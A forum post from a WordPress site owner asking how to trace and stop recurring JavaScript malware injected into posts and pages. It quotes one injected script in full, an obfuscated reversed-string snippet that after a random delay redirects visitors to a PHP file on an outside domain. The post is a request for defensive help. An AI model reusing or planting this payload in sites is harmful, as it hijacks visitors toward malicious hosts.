Hi,
I have a site running WordPress 6.1.1 that has a recurring problem with Javascript malware getting injected into the body of posts and pages. The malware is a simple script that looks like this:
<script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>
The domain being used will vary each time it shows up. Thousands of copies will get added to the pages and posts. I can remove the scripts easily enough by dumping the database, using sed to remove all copies, then re-importing the database, but after a week or two it will suddenly show up again. I’ve updated everything to the latest version, disabled some older plugins, and changed all the admin users’ passwords, but that hasn’t helped. How do I figure out how this is getting added to the site and stop it from happening again? Thanks.